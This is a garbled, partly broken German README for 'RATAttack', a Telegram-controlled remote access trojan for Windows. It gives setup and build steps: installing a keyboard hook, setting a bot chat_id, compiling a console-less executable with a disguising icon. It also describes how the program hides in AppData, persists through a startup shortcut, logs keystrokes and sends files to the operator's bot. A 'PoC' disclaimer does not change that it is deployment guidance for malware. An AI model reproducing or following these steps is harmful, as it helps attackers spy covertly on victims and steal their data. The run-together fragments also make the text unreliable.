
Windows Remote Post Breach Tool via Telegram
Windows Remote Post Breach Tool via Telegram (Python 2.7), Ursprünglich erstellt von Ritiek, geforkt und modifiziert von mvrozanti und danach von mir.
Der gesamte Zweck dieses Tools ist es, (als „PoC“) die Kontrolle über eine bereits kompromittierte Maschine über Telegram zu demonstrieren. Wie bei meinen bereits geschriebenen Tools befürworte ich keine illegalen Aktivitäten.
Diese modifizierte Version verwendet die Telegram Bot API v2 anstelle der traditionellen v1. Die Hauptänderung sind Tastatur‑Buttons anstelle von Texteingabe. Ich werde versuchen, neue Funktionen hinzuzufügen, Fehler zu beheben und mit der API v3 kompatibel zu sein, nachdem ich die von „mvrozanti“ benötigten Änderungen übernommen habe. In der Zwischenzeit funktionieren die Befehle cd, download, upload, run und delete nicht.

file an den Telegram-BotDie derzeitigen Remote Administration Tools auf dem Markt haben zwei große Probleme:
Dieser RAT überwindet beide Probleme durch die Verwendung der Telegram Bot API.
BotFather sprechen.pip install -r requirements.txt.64‑Bit oder 32‑Bit, je nach Ihrem System.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id aus der Konsole, ersetzen Sie sie im Skript und kommentieren Sie die Zeile return True aus. Keine Sorge, Sie werden es wissen, wenn Sie die Kommentare im Skript lesen.
Ersetzen Sie Ihren Pfad in compileAndRun.bat (durch Ausführen wird die ausführbare Datei gestartet)
Führen Sie `pyinstaller --onefile --noconsole C:\pfad\zu\RATAttack.py` aus. Sie können auch `--icon=<pfad\zu\icon.ico>` übergeben, um ein benutzerdefiniertes Symbol zu verwenden.
.exe-Datei in C:\Python27\Scripts\dist\. Sie können den Namen der .exe nach Belieben ändern..exe ausführen, versteckt sich das Skript und infiziert Ihren PC, um beim Start ausgeführt zu werden. Sie können den Normalzustand wiederherstellen, indem Sie die Option /self_destruct verwenden oder manuell das Verzeichnis C:\Users\Benutzername\AppData\Roaming\Portal und C:\Users\Benutzername\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk entfernen (ich empfehle jedoch, sie vorerst manuell zu entfernen)..exe-Datei sowie den Speicherort und Namen des Ordners ändern, in dem sich die versteckte .exe versteckt. Ändern Sie dazu compiled_name und hide_folder entsprechend.The MIT License
RATAttack wird in Ihrem Arbeitsverzeichnis erstellt, der keylogs.txt und alle Dateien enthält, die Sie auf den Bot hochladen.